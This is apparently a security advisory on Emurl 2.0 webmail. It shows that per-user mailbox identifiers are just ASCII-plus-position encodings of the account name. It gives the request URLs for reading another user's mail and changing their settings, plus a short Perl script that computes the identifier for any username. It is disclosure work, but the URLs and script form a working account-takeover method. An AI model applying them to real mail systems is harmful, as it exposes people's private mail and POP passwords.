COMMAND
EMURL
SYSTEMS AFFECTED
EMURL-based e-mail providers (Emurl 2.0 For Windows NT 4.0)
PROBLEM
Pierre Benoit found following. Emurl is web-based email host
developped by SeattleLab. Users can access the mailbox's content
of anybody on the system. They can also steal their POP passwords
since Emurl allows you to fetch your POP email from more than one
source.
After logging into his new mail account powered by the Emurl
software, this URL strucked Pierre:
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123
You all know where this is going. First, this identifier is based
solely on your account name. Therefore, if you create an account
with the same name on another site, you'll end up with the very
same identifier. Furthermore, this identifier can easily be
determined since it is "encoded" using the ascii value of each
character of the account's name and incremented by its position.
In this example, user ID would be PBenoit and his resulting
identifier would be 113100104114116111123.
p = 112 + 1 = 113
b = 98 + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123
You could fetch the e-mails here.
http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>
... and view/change the account's settings here
http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>
Pierre threw a few lines of perl together to generate this.
print "Enter your ID: ";
$_=lc(<STDIN>); chomp;
print "Your identifier is: ";
@letters=split(//, $_);
for ($i = 0; $i < length($_); $i++) {
$mychar = ord($letters[$i])+$i+1;
if ($mychar < 100)
{ $mychar = (0).$mychar;}
print $mychar
}
SOLUTION
SeattleLab is aware and the issue is addressed in their next
release.